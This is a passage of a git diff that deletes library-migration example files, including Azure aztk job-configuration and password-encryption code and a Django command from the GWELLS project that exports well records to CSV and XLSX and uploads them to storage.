cloud_task.depends_on - self._application_package_references = cloud_task.application_package_references - self._authentication_token_settings = cloud_task.authentication_token_settings - self._url = cloud_task.url - self._e_tag = cloud_task.e_tag - - -class JobConfiguration: - def __init__( - self, - id, - applications, - vm_size, - custom_scripts=None, - spark_configuration=None, - toolkit=None, - max_dedicated_nodes=0, - max_low_pri_nodes=0, - subnet_id=None, - worker_on_master=None): - self.id = id - self.applications = applications - self.custom_scripts = custom_scripts - self.spark_configuration = spark_configuration - self.vm_size = vm_size - self.gpu_enabled = helpers.is_gpu_enabled(vm_size) - self.toolkit = toolkit - self.max_dedicated_nodes = max_dedicated_nodes - self.max_low_pri_nodes = max_low_pri_nodes - self.subnet_id = subnet_id - self.worker_on_master = worker_on_master - - def to_cluster_config(self): - return ClusterConfiguration( - cluster_id=self.id, - custom_scripts=self.custom_scripts, - toolkit=self.toolkit, - vm_size=self.vm_size, - vm_count=self.max_dedicated_nodes, - vm_low_pri_count=self.max_low_pri_nodes, - subnet_id=self.subnet_id, - worker_on_master=self.worker_on_master, - spark_configuration=self.spark_configuration, - ) - - def mixed_mode(self) -> bool: - return self.max_dedicated_nodes > 0 and self.max_low_pri_nodes > 0 - - def get_docker_repo(self) -> str: - return self.toolkit.get_docker_repo(self.gpu_enabled) - - def validate(self) -> bool: - """ - Validate the config at its current state. - Raises: Error if invalid - """ - if self.toolkit is None: - raise error.InvalidModelError( - "Please supply a toolkit in the cluster configuration") - - self.toolkit.validate() - - if self.id is None: - raise error.AztkError("Please supply an ID for the Job in your configuration.") - - if self.max_dedicated_nodes == 0 and self.max_low_pri_nodes == 0: - raise error.AztkError( - "Please supply a valid (greater than 0) value for either max_dedicated_nodes or max_low_pri_nodes in your configuration." - ) - - if self.vm_size is None: - raise error.AztkError( - "Please supply a vm_size in your configuration." - ) - - if self.mixed_mode() and not self.subnet_id: - raise error.AztkError( - "You must configure a VNET to use AZTK in mixed mode (dedicated and low priority nodes) and pass the subnet_id in your configuration.." - ) - - -class JobState(): - complete = 'completed' - active = "active" - completed = "completed" - disabled = "disabled" - terminating = "terminating" - deleting = "deleting" - - -class Job(): - def __init__(self, cloud_job_schedule: batch_models.CloudJobSchedule, - cloud_tasks: List[batch_models.CloudTask] = None, - pool: batch_models.CloudPool = None, - nodes: batch_models.ComputeNodePaged = None): - self.id = cloud_job_schedule.id - self.last_modified = cloud_job_schedule.last_modified - self.state = cloud_job_schedule.state._value_ - self.state_transition_time = cloud_job_schedule.state_transition_time - self.creation_time = cloud_job_schedule.creation_time - self.applications = [Application(task) for task in (cloud_tasks or [])] - if pool: - self.cluster = Cluster(pool, nodes) - else: - self.cluster = None - - -class ApplicationLog(): - def __init__(self, name: str, cluster_id: str, log: str, total_bytes: int, application_state: batch_models.TaskState, exit_code: int): - self.name = name - self.cluster_id = cluster_id # TODO: change to something cluster/job agnostic - self.log = log - self.total_bytes = total_bytes - self.application_state = application_state - self.exit_code = exit_code diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.diff b/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.diff deleted file mode 100644 index d34a3e3..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.diff +++ /dev/null @@ -1,14 +0,0 @@ -diff --git a/aztk/utils/secure_utils.py b/aztk/utils/secure_utils.py - index 3d16cf39545e39ee52fa350c7f251c2cc8679228..19dde429a702c29bdcf86a69805053ecfd02edee 100644 - --- a/aztk/utils/secure_utils.py - +++ b/aztk/utils/secure_utils.py -@@ -1,6 +1,6 @@ --from Crypto.PublicKey import RSA --from Crypto.Random import get_random_bytes --from Crypto.Cipher import AES, PKCS1_OAEP -+from Cryptodome.PublicKey import RSA -+from Cryptodome.Random import get_random_bytes -+from Cryptodome.Cipher import AES, PKCS1_OAEP - - def encrypt_password(ssh_pub_key, password): - if not password: diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.source.py b/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.source.py deleted file mode 100644 index 459cc3a..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.source.py +++ /dev/null @@ -1,18 +0,0 @@ -from Crypto.PublicKey import RSA -from Crypto.Random import get_random_bytes -from Crypto.Cipher import AES, PKCS1_OAEP - -def encrypt_password(ssh_pub_key, password): - if not password: - return [None, None, None, None] - recipient_key = RSA.import_key(ssh_pub_key) - session_key = get_random_bytes(16) - - # Encrypt the session key with the public RSA key - cipher_rsa = PKCS1_OAEP.new(recipient_key) - encrypted_aes_session_key = cipher_rsa.encrypt(session_key) - - # Encrypt the data with the AES session key - cipher_aes = AES.new(session_key, AES.MODE_EAX) - ciphertext, tag = cipher_aes.encrypt_and_digest(password.encode()) - return [encrypted_aes_session_key, cipher_aes.nonce, tag, ciphertext] diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.target.py b/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.target.py deleted file mode 100644 index 843b3d1..0000000 --- a/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.target.py +++ /dev/null @@ -1,18 +0,0 @@ -from Cryptodome.PublicKey import RSA -from Cryptodome.Random import get_random_bytes -from Cryptodome.Cipher import AES, PKCS1_OAEP - -def encrypt_password(ssh_pub_key, password): - if not password: - return [None, None, None, None] - recipient_key = RSA.import_key(ssh_pub_key) - session_key = get_random_bytes(16) - - # Encrypt the session key with the public RSA key - cipher_rsa = PKCS1_OAEP.new(recipient_key) - encrypted_aes_session_key = cipher_rsa.encrypt(session_key) - - # Encrypt the data with the AES session key - cipher_aes = AES.new(session_key, AES.MODE_EAX) - ciphertext, tag = cipher_aes.encrypt_and_digest(password.encode()) - return [encrypted_aes_session_key, cipher_aes.nonce, tag, ciphertext] diff --git a/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.diff b/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.diff deleted file mode 100644 index 519b186..0000000 --- a/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.diff +++ /dev/null @@ -1,127 +0,0 @@ -diff --git a/app/backend/wells/management/commands/export.py b/app/backend/wells/management/commands/export.py - index e2e9915cec9556564e51e0e6d79eb6bec8f64c30..472f336f5db32ead27b6f4e171c6b8f782da8a02 100644 - --- a/app/backend/wells/management/commands/export.py - +++ b/app/backend/wells/management/commands/export.py -@@ -2,16 +2,16 @@ import csv - import zipfile - import os - import logging -+import string - - from django.core.management.base import BaseCommand - from django.db import models - from django.db import connection - - from minio import Minio --import xlsxwriter -+from openpyxl import Workbook - - from gwells.settings.base import get_env_variable --from wells.models import Well, LithologyDescription, Casing, Screen, ProductionData, Perforation - - # Run from command line : - # python manage.py export -@@ -50,7 +50,7 @@ class Command(BaseCommand): - - def export(self, workbook, gwells_zip, worksheet_name, cursor): - logger.info('exporting {}'.format(worksheet_name)) -- worksheet = workbook.add_worksheet(worksheet_name) -+ worksheet = workbook.create_sheet(worksheet_name) - csv_file = '{}.csv'.format(worksheet_name) - if os.path.exists(csv_file): - os.remove(csv_file) -@@ -60,8 +60,8 @@ class Command(BaseCommand): - values = [] - # Write the headings - for index, field in enumerate(cursor.description): -- worksheet.write(0, index, '{}'.format(field.name)) - values.append(field.name) -+ worksheet.append(values) - csvwriter.writerow(values) - - # Write the values -@@ -70,16 +70,22 @@ class Command(BaseCommand): - values = [] - num_values = 0 - for col, value in enumerate(record): -- if value: -+ if not (value == "" or value is None): - num_values += 1 -- values.append(value) -+ if type(value) is str: -+ # There are lots of non-printable characters in the source data that can cause -+ # issues in the export, so we have to clear them out. -+ v = ''.join([s for s in value if s in string.printable]) -+ # We can't have something starting with an = sign, -+ # it would be interpreted as a formula in excel. -+ if v.startswith('='): -+ v = '\'{}'.format(v) -+ values.append(v) -+ else: -+ values.append(value) - if num_values > 1: -- # We always have a well_tag_number, but if that's all we have, then just skip this record -- row_index += 1 -- for col, value in enumerate(values): -- if value: -- worksheet.write(row_index, col, value) - csvwriter.writerow(values) -+ worksheet.append(values) - gwells_zip.write(csv_file) - if os.path.exists(csv_file): - os.remove(csv_file) -@@ -194,28 +200,29 @@ class Command(BaseCommand): - with zipfile.ZipFile(zip_filename, 'w') as gwells_zip: - if os.path.exists(spreadsheet_filename): - os.remove(spreadsheet_filename) -- with xlsxwriter.Workbook(spreadsheet_filename) as workbook: -- # Well -- with connection.cursor() as cursor: -- cursor.execute(well_sql) -- self.export(workbook, gwells_zip, 'well', cursor) -- # Lithology -- with connection.cursor() as cursor: -- cursor.execute(lithology_sql) -- self.export(workbook, gwells_zip, 'lithology', cursor) -- # Casing -- with connection.cursor() as cursor: -- cursor.execute(casing_sql) -- self.export(workbook, gwells_zip, 'casing', cursor) -- # Screen -- with connection.cursor() as cursor: -- cursor.execute(screen_sql) -- self.export(workbook, gwells_zip, 'screen', cursor) -- # Production -- with connection.cursor() as cursor: -- cursor.execute(production_sql) -- self.export(workbook, gwells_zip, 'production', cursor) -- # Perforation -- with connection.cursor() as cursor: -- cursor.execute(perforation_sql) -- self.export(workbook, gwells_zip, 'perforation', cursor) -+ workbook = Workbook(write_only=True) -+ # Well -+ with connection.cursor() as cursor: -+ cursor.execute(well_sql) -+ self.export(workbook, gwells_zip, 'well', cursor) -+ # Lithology -+ with connection.cursor() as cursor: -+ cursor.execute(lithology_sql) -+ self.export(workbook, gwells_zip, 'lithology', cursor) -+ # Casing -+ with connection.cursor() as cursor: -+ cursor.execute(casing_sql) -+ self.export(workbook, gwells_zip, 'casing', cursor) -+ # Screen -+ with connection.cursor() as cursor: -+ cursor.execute(screen_sql) -+ self.export(workbook, gwells_zip, 'screen', cursor) -+ # Production -+ with connection.cursor() as cursor: -+ cursor.execute(production_sql) -+ self.export(workbook, gwells_zip, 'production', cursor) -+ # Perforation -+ with connection.cursor() as cursor: -+ cursor.execute(perforation_sql) -+ self.export(workbook, gwells_zip, 'perforation', cursor) -+ workbook.save(filename=spreadsheet_filename) diff --git a/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.source.py b/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.source.py deleted file mode 100644 index 0ce5602..0000000 --- a/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.source.py +++ /dev/null @@ -1,221 +0,0 @@ -import csv -import zipfile -import os -import logging - -from django.core.management.base import BaseCommand -from django.db import models -from django.db import connection - -from minio import Minio -import xlsxwriter - -from gwells.settings.base import get_env_variable -from wells.models import Well, LithologyDescription, Casing, Screen, ProductionData, Perforation - -# Run from command line : -# python manage.py export - -logger = logging.getLogger(__name__) - - -class Command(BaseCommand): - - def handle(self, *args, **options): - logger.info('starting export') - zip_filename = 'gwells.zip' - spreadsheet_filename = 'gwells.xlsx' - self.generate_files(zip_filename, spreadsheet_filename) - self.upload_files(zip_filename, spreadsheet_filename) - logger.info('cleaning up') - for filename in (zip_filename, spreadsheet_filename): - if os.path.exists(filename): - os.remove(filename) - logger.info('export complete') - - def upload_files(self, zip_filename, spreadsheet_filename): - minioClient = Minio(get_env_variable('S3_HOST'), - access_key=get_env_variable('S3_PUBLIC_ACCESS_KEY'), - secret_key=get_env_variable('S3_PUBLIC_SECRET_KEY'), - secure=True) - for filename in (zip_filename, spreadsheet_filename): - logger.info('uploading {}'.format(filename)) - with open(filename, 'rb') as file_data: - file_stat = os.stat(filename) - # Do we need to remove the existing files 1st? - minioClient.put_object(get_env_variable('S3_WELL_EXPORT_BUCKET'), - filename, - file_data, - file_stat.st_size) - - def export(self, workbook, gwells_zip, worksheet_name, cursor): - logger.info('exporting {}'.format(worksheet_name)) - worksheet = workbook.add_worksheet(worksheet_name) - csv_file = '{}.csv'.format(worksheet_name) - if os.path.exists(csv_file): - os.remove(csv_file) - with open(csv_file, 'w') as csvfile: - csvwriter = csv.writer(csvfile, dialect='excel') - - values = [] - # Write the headings - for index, field in enumerate(cursor.description): - worksheet.write(0, index, '{}'.format(field.name)) - values.append(field.name) - csvwriter.writerow(values) - - # Write the values - row_index = 0 - for row, record in enumerate(cursor.fetchall()): - values = [] - num_values = 0 - for col, value in enumerate(record): - if value: - num_values += 1 - values.append(value) - if num_values > 1: - # We always have a well_tag_number, but if that's all we have, then just skip this record - row_index += 1 - for col, value in enumerate(values): - if value: - worksheet.write(row_index, col, value) - csvwriter.writerow(values) - gwells_zip.write(csv_file) - if os.path.exists(csv_file): - os.remove(csv_file) - - def generate_files(self, zip_filename, spreadsheet_filename): - ####### - # WELL - ####### - well_sql = ("""select well_tag_number, identification_plate_number, - well_identification_plate_attached, - well_status_code, well.well_class_code, - wsc.well_class_code as well_subclass, - intended_water_use_code, licenced_status_code, - observation_well_number, obs_well_status_code, water_supply_system_name, - water_supply_system_well_name, - street_address, city, legal_lot, legal_plan, legal_district_lot, legal_block, - legal_section, legal_township, legal_range, - land_district_code, - legal_pid, - well_location_description, - latitude, longitude, utm_zone_code, utm_northing, utm_easting, - utm_accuracy_code, bcgs_id, - construction_start_date, construction_end_date, alteration_start_date, - alteration_end_date, decommission_start_date, decommission_end_date, - driller_name, consultant_name, consultant_company, - diameter, total_depth_drilled, finished_well_depth, final_casing_stick_up, - bedrock_depth, ground_elevation, ground_elevation_method_code, static_water_level, - well_yield, - well_yield_unit_code, - artesian_flow, artesian_pressure, well_cap_type, well_disinfected, - drilling_method_code, other_drilling_method, well_orientation, - alternative_specs_submitted, - surface_seal_material_code, surface_seal_method_code, surface_seal_length, - backfill_type, - backfill_depth, - liner_material_code, liner_diameter, liner_thickness, surface_seal_thickness, - liner_from, liner_to, - screen_intake_method_code, screen_type_code, screen_material_code, - other_screen_material, - screen_opening_code, screen_bottom_code, other_screen_bottom, development_method_code, - filter_pack_from, - filter_pack_to, filter_pack_material_code, - filter_pack_thickness, - filter_pack_material_size_code, - development_hours, development_notes, - water_quality_colour, water_quality_odour, ems_id, - decommission_reason, decommission_method_code, decommission_details, sealant_material, - backfill_material, - comments, aquifer_id, - drilling_company.drilling_company_code, - ems, - aquifer_id, - registries_person.surname as driller_responsible - from well - left join well_subclass_code as wsc on wsc.well_subclass_guid = well.well_subclass_guid - left join drilling_company on - drilling_company.drilling_company_guid = well.drilling_company_guid - left join registries_person on - registries_person.person_guid = well.driller_responsible_guid - order by well_tag_number""") - ########### - # LITHOLOGY - ########### - lithology_sql = ("""select well_tag_number, lithology_from, lithology_to, lithology_raw_data, - ldc.description as lithology_description_code, - lmc.description as lithology_material_code, - lhc.description as lithology_hardness_code, - lcc.description as lithology_colour_code, - water_bearing_estimated_flow, - well_yield_unit_code, lithology_observation - from lithology_description - left join lithology_description_code as ldc on - ldc.lithology_description_code = lithology_description.lithology_description_code - left join lithology_material_code as lmc on - lmc.lithology_material_code = lithology_description.lithology_material_code - left join lithology_hardness_code as lhc on - lhc.lithology_hardness_code = lithology_description.lithology_hardness_code - left join lithology_colour_code as lcc on - lcc.lithology_colour_code = lithology_description.lithology_colour_code - order by well_tag_number""") - ######## - # CASING - ######## - casing_sql = ("""select well_tag_number, casing_from, casing_to, diameter, casing_code, - casing_material_code, wall_thickness, drive_shoe from casing - order by well_tag_number""") - ######## - # SCREEN - ######## - screen_sql = ("""select well_tag_number, screen_from, screen_to, internal_diameter, - screen_assembly_type_code, slot_size from screen - order by well_tag_number""") - ############ - # PRODUCTION - ############ - production_sql = ("""select well_tag_number, yield_estimation_method_code, well_yield_unit_code, - yield_estimation_rate, - yield_estimation_duration, static_level, drawdown, - hydro_fracturing_performed, hydro_fracturing_yield_increase from production_data - order by well_tag_number""") - ############## - # PERFORATIONS - ############## - perforation_sql = ("""select well_tag_number, liner_from, liner_to, liner_diameter, - liner_perforation_from, liner_perforation_to, liner_thickness - from - perforation - order by well_tag_number""") - - if os.path.exists(zip_filename): - os.remove(zip_filename) - with zipfile.ZipFile(zip_filename, 'w') as gwells_zip: - if os.path.exists(spreadsheet_filename): - os.remove(spreadsheet_filename) - with xlsxwriter.Workbook(spreadsheet_filename) as workbook: - # Well - with connection.cursor() as cursor: - cursor.execute(well_sql) - self.export(workbook, gwells_zip, 'well', cursor) - # Lithology - with connection.cursor() as cursor: - cursor.execute(lithology_sql) - self.export(workbook, gwells_zip, 'lithology', cursor) - # Casing - with connection.cursor() as cursor: - cursor.execute(casing_sql) - self.export(workbook, gwells_zip, 'casing', cursor) - # Screen - with connection.cursor() as cursor: - cursor.execute(screen_sql) - self.export(workbook, gwells_zip, 'screen', cursor) - # Production - with connection.cursor() as cursor: - cursor.execute(production_sql) - self.export(workbook, gwells_zip, 'production', cursor) - # Perforation - with connection.cursor() as cursor: - cursor.execute(perforation_sql) - self.export(workbook, gwells_zip, 'perforation', cursor) diff --git a/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.target.py b/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.target.py deleted file mode 100644 index 1085816..0000000 --- a/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.target.py +++ /dev/null @@ -1,228 +0,0 @@ -import csv -import zipfile -import os -import logging -import string - -from django.core.management.base import BaseCommand -from django.db import models -from django.db import connection - -from minio import Minio -from openpyxl import Workbook - -from gwells.settings.base import get_env_variable - -# Run from command line : -# python manage.py export - -logger = logging.getLogger(__name__) - - -class Command(BaseCommand): - - def handle(self, *args, **options): - logger.info('starting export') - zip_filename = 'gwells.zip' - spreadsheet_filename = 'gwells.xlsx' - self.generate_files(zip_filename, spreadsheet_filename) - self.upload_files(zip_filename, spreadsheet_filename) - logger.info('cleaning up') - for filename in (zip_filename, spreadsheet_filename): - if os.path.exists(filename): - os.remove(filename) - logger.info('export complete') - - def upload_files(self, zip_filename, spreadsheet_filename): - minioClient = Minio(get_env_variable('S3_HOST'), - access_key=get_env_variable('S3_PUBLIC_ACCESS_KEY'), - secret_key=get_env_variable('S3_PUBLIC_SECRET_KEY'), - secure=True) - for filename in (zip_filename, spreadsheet_filename): - logger.info('uploading {}'.format(filename)) - with open(filename, 'rb') as file_data: - file_stat = os.stat(filename) - # Do we need to remove the existing files 1st? - minioClient.put_object(get_env_variable('S3_WELL_EXPORT_BUCKET'), - filename, - file_data, - file_stat.st_size) - - def export(self, workbook, gwells_zip, worksheet_name, cursor): - logger.info('exporting {}'.format(worksheet_name)) - worksheet = workbook.create_sheet(worksheet_name) - csv_file = '{}.csv'.format(worksheet_name) - if os.path.exists(csv_file): - os.remove(csv_file) - with open(csv_file, 'w') as csvfile: - csvwriter = csv.writer(csvfile, dialect='excel') - - values = [] - # Write the headings - for index, field in enumerate(cursor.description): - values.append(field.name) - worksheet.append(values) - csvwriter.writerow(values) - - # Write the values - row_index = 0 - for row, record in enumerate(cursor.fetchall()): - values = [] - num_values = 0 - for col, value in enumerate(record): - if not (value == "" or value is None): - num_values += 1 - if type(value) is str: - # There are lots of non-printable characters in the source data that can cause - # issues in the export, so we have to clear them out. - v = ''.join([s for s in value if s in string.printable]) - # We can't have something starting with an = sign, - # it would be interpreted as a formula in excel. - if v.startswith('='): - v = '\'{}'.format(v) - values.append(v) - else: - values.append(value) - if num_values > 1: - csvwriter.writerow(values) - worksheet.append(values) - gwells_zip.write(csv_file) - if os.path.exists(csv_file): - os.remove(csv_file) - - def generate_files(self, zip_filename, spreadsheet_filename): - ####### - # WELL - ####### - well_sql = ("""select well_tag_number, identification_plate_number, - well_identification_plate_attached, - well_status_code, well.well_class_code, - wsc.well_class_code as well_subclass, - intended_water_use_code, licenced_status_code, - observation_well_number, obs_well_status_code, water_supply_system_name, - water_supply_system_well_name, - street_address, city, legal_lot, legal_plan, legal_district_lot, legal_block, - legal_section, legal_township, legal_range, - land_district_code, - legal_pid, - well_location_description, - latitude, longitude, utm_zone_code, utm_northing, utm_easting, - utm_accuracy_code, bcgs_id, - construction_start_date, construction_end_date, alteration_start_date, - alteration_end_date, decommission_start_date, decommission_end_date, - driller_name, consultant_name, consultant_company, - diameter, total_depth_drilled, finished_well_depth, final_casing_stick_up, - bedrock_depth, ground_elevation, ground_elevation_method_code, static_water_level, - well_yield, - well_yield_unit_code, - artesian_flow, artesian_pressure, well_cap_type, well_disinfected, - drilling_method_code, other_drilling_method, well_orientation, - alternative_specs_submitted, - surface_seal_material_code, surface_seal_method_code, surface_seal_length, - backfill_type, - backfill_depth, - liner_material_code, liner_diameter, liner_thickness, surface_seal_thickness, - liner_from, liner_to, - screen_intake_method_code, screen_type_code, screen_material_code, - other_screen_material, - screen_opening_code, screen_bottom_code, other_screen_bottom, development_method_code, - filter_pack_from, - filter_pack_to, filter_pack_material_code, - filter_pack_thickness, - filter_pack_material_size_code, - development_hours, development_notes, - water_quality_colour, water_quality_odour, ems_id, - decommission_reason, decommission_method_code, decommission_details, sealant_material, - backfill_material, - comments, aquifer_id, - drilling_company.drilling_company_code, - ems, - aquifer_id, - registries_person.surname as driller_responsible - from well - left join well_subclass_code as wsc on wsc.well_subclass_guid = well.well_subclass_guid - left join drilling_company on - drilling_company.drilling_company_guid = well.drilling_company_guid - left join registries_person on - registries_person.person_guid = well.driller_responsible_guid - order by well_tag_number""") - ########### - # LITHOLOGY - ########### - lithology_sql = ("""select well_tag_number, lithology_from, lithology_to, lithology_raw_data, - ldc.description as lithology_description_code, - lmc.description as lithology_material_code, - lhc.description as lithology_hardness_code, - lcc.description as lithology_colour_code, - water_bearing_estimated_flow, - well_yield_unit_code, lithology_observation - from lithology_description - left join lithology_description_code as ldc on - ldc.lithology_description_code = lithology_description.lithology_description_code - left join lithology_material_code as lmc on - lmc.lithology_material_code = lithology_description.lithology_material_code - left join lithology_hardness_code as lhc on - lhc.lithology_hardness_code = lithology_description.lithology_hardness_code - left join lithology_colour_code as lcc on - lcc.lithology_colour_code = lithology_description.lithology_colour_code - order by well_tag_number""") - ######## - # CASING - ######## - casing_sql = ("""select well_tag_number, casing_from, casing_to, diameter, casing_code, - casing_material_code, wall_thickness, drive_shoe from casing - order by well_tag_number""") - ######## - # SCREEN - ######## - screen_sql = ("""select well_tag_number, screen_from, screen_to, internal_diameter, - screen_assembly_type_code, slot_size from screen - order by well_tag_number""") - ############ - # PRODUCTION - ############ - production_sql = ("""select well_tag_number, yield_estimation_method_code, well_yield_unit_code, - yield_estimation_rate, - yield_estimation_duration, static_level, drawdown, - hydro_fracturing_performed, hydro_fracturing_yield_increase from production_data - order by well_tag_number""") - ############## - # PERFORATIONS - ############## - perforation_sql = ("""select well_tag_number, liner_from, liner_to, liner_diameter, - liner_perforation_from, liner_perforation_to, liner_thickness - from - perforation - order by well_tag_number""") - - if os.path.exists(zip_filename): - os.remove(zip_filename) - with zipfile.ZipFile(zip_filename, 'w') as gwells_zip: - if os.path.exists(spreadsheet_filename): - os.remove(spreadsheet_filename) - workbook = Workbook(write_only=True) - # Well - with connection.cursor() as cursor: - cursor.execute(well_sql) - self.export(workbook, gwells_zip, 'well', cursor) - # Lithology - with connection.cursor() as cursor: - cursor.execute(lithology_sql) - self.export(workbook, gwells_zip, 'lithology', cursor) - # Casing - with connection.cursor() as cursor: - cursor.execute(casing_sql) - self.export(workbook, gwells_zip, 'casing', cursor) - # Screen - with connection.cursor() as cursor: - cursor.execute(screen_sql) - self.export(workbook, gwells_zip, 'screen', cursor) - # Production - with connection.cursor() as cursor: - cursor.execute(production_sql) - self.export(workbook, gwells_zip, 'production', cursor) - # Perforation - with connection.cursor() as cursor: - cursor.execute(perforation_sql) - self.export(workbook, gwells_zip, 'perforation', cursor) - workbook.save(filename=spreadsheet_filename) diff --git a/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.diff b/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.diff deleted file mode 100644 index 4ef135a..0000000 --- a/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.diff +++ /dev/null @@ -1,101 +0,0 @@ -diff --git a/app/backend/wells/management/commands/export.py b/app/backend/wells/management/commands/export.py - index 944e5ba346c19fab589baf601ab2da73b66e73db..57d12c42941e0afb07ac46fb51f8316d6c5a0cea 100644 - --- a/app/backend/wells/management/commands/export.py - +++ b/app/backend/wells/management/commands/export.py -@@ -9,7 +9,7 @@ from django.db import models - from django.db import connection - - from minio import Minio --from openpyxl import Workbook -+from xlsxwriter import Workbook - - from gwells.settings.base import get_env_variable - -@@ -50,7 +50,7 @@ class Command(BaseCommand): - - def export(self, workbook, gwells_zip, worksheet_name, cursor): - logger.info('exporting {}'.format(worksheet_name)) -- worksheet = workbook.create_sheet(worksheet_name) -+ worksheet = workbook.add_worksheet(worksheet_name) - csv_file = '{}.csv'.format(worksheet_name) - if os.path.exists(csv_file): - os.remove(csv_file) -@@ -60,8 +60,8 @@ class Command(BaseCommand): - values = [] - # Write the headings - for index, field in enumerate(cursor.description): -+ worksheet.write(0, index, '{}'.format(field.name)) - values.append(field.name) -- worksheet.append(values) - csvwriter.writerow(values) - - # Write the values -@@ -84,8 +84,12 @@ class Command(BaseCommand): - else: - values.append(value) - if num_values > 1: -+ # We always have a well_tag_number, but if that's all we have, then just skip this record -+ row_index += 1 -+ for col, value in enumerate(values): -+ if value: -+ worksheet.write(row_index, col, value) - csvwriter.writerow(values) -- worksheet.append(values) - gwells_zip.write(csv_file) - if os.path.exists(csv_file): - os.remove(csv_file) -@@ -200,29 +204,28 @@ class Command(BaseCommand): - with zipfile.ZipFile(zip_filename, 'w') as gwells_zip: - if os.path.exists(spreadsheet_filename): - os.remove(spreadsheet_filename) -- workbook = Workbook(write_only=True) -- # Well -- with connection.cursor() as cursor: -- cursor.execute(well_sql) -- self.export(workbook, gwells_zip, 'well', cursor) -- # Lithology -- with connection.cursor() as cursor: -- cursor.execute(lithology_sql) -- self.export(workbook, gwells_zip, 'lithology', cursor) -- # Casing -- with connection.cursor() as cursor: -- cursor.execute(casing_sql) -- self.export(workbook, gwells_zip, 'casing', cursor) -- # Screen -- with connection.cursor() as cursor: -- cursor.execute(screen_sql) -- self.export(workbook, gwells_zip, 'screen', cursor) -- # Production -- with connection.cursor() as cursor: -- cursor.execute(production_sql) -- self.export(workbook, gwells_zip, 'production', cursor) -- # Perforation -- with connection.cursor() as cursor: -- cursor.execute(perforation_sql) -- self.export(workbook, gwells_zip, 'perforation', cursor) -- workbook.save(filename=spreadsheet_filename) -+ with Workbook(spreadsheet_filename) as workbook: -+ # Well -+ with connection.cursor() as cursor: -+ cursor.execute(well_sql) -+ self.export(workbook, gwells_zip, 'well', cursor) -+ # Lithology -+ with connection.cursor() as cursor: -+ cursor.execute(lithology_sql) -+ self.export(workbook, gwells_zip, 'lithology', cursor) -+ # Casing -+ with connection.cursor() as cursor: -+ cursor.execute(casing_sql) -+ self.export(workbook, gwells_zip, 'casing', cursor) -+ # Screen -+ with connection.cursor() as cursor: -+ cursor.execute(screen_sql) -+ self.export(workbook, gwells_zip, 'screen', cursor) -+ # Production -+ with connection.cursor() as cursor: -+ cursor.execute(production_sql) -+ self.export(workbook, gwells_zip, 'production', cursor) -+ # Perforation -+ with connection.cursor() as cursor: -+ cursor.execute(perforation_sql) -+ self.export(workbook, gwells_zip, 'perforation', cursor) diff --git a/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.source.py b/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.source.py deleted file mode 100644 index 1085816..0000000 --- a/v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.source.py +++ /dev/null @@ -1,228 +0,0 @@ -import csv -import zipfile -import os -import logging -import string - -from django.core.management.base import BaseCommand -from django.db import models -from django.db import connection - -from minio import Minio -from openpyxl import Workbook - -from gwells.settings.base import get_env_variable - -# Run from command line : -# python manage.py export - -logger = logging.getLogger(__name__) - - -class Command(BaseCommand): - - def handle(self, *args, **options): - logger.info('starting export') - zip_filename = 'gwells.zip' - spreadsheet_filename = 'gwells.xlsx' - self.generate_files(zip_filename, spreadsheet_filename) - self.upload_files(zip_filename, spreadsheet_filename) - logger.info('cleaning up') - for filename in (zip_filename, spreadsheet_filename): - if os.path.exists(filename): - os.remove(filename) - logger.info('export complete') - - def upload_files(self, zip_filename, spreadsheet_filename): - minioClient = Minio(get_env_variable('S3_HOST'), - access_key=get_env_variable('S3_PUBLIC_ACCESS_KEY'), - secret_key=get_env_variable('S3_PUBLIC_SECRET_KEY'), - secure=True) - for filename in (zip_filename, spreadsheet_filename): - logger.info('uploading {}'.format(filename)) - with open(filename, 'rb') as file_data: - file_stat = os.stat(filename) - # Do we need to remove the existing files 1st? - minioClient.put_object(get_env_variable('S3_WELL_EXPORT_BUCKET'), - filename, - file_data, - file_stat.st_size) - - def export(self, workbook, gwells_zip, worksheet_name, cursor): - logger.info('exporting {}'.format(worksheet_name)) - worksheet = workbook.create_sheet(worksheet_name) - csv_file = '{}.csv'.format(worksheet_name) - if os.path.exists(csv_file): - os.remove(csv_file) - with open(csv_file, 'w') as csvfile: - csvwriter = csv.writer(csvfile, dialect='excel') - - values = [] - # Write the headings - for index, field in enumerate(cursor.description): - values.append(field.name) - worksheet.append(values) - csvwriter.writerow(values) - - # Write the values - row_index = 0 - for row, record in enumerate(cursor.fetchall()): - values = [] - num_values = 0 - for col, value in enumerate(record): - if not (value == "" or value is None): - num_values += 1 - if type(value) is str: - # There are lots of non-printable characters in the source data that can cause - # issues in the export, so we have to clear them out. - v = ''.join([s for s in value if s in string.printable]) - # We can't have something starting with an = sign, - # it would be interpreted as a formula in excel. - if v.startswith('='): - v = '\'{}'.format(v) - values.append(v) - else: - values.append(value) - if num_values > 1: - csvwriter.writerow(values) - worksheet.append(values) - 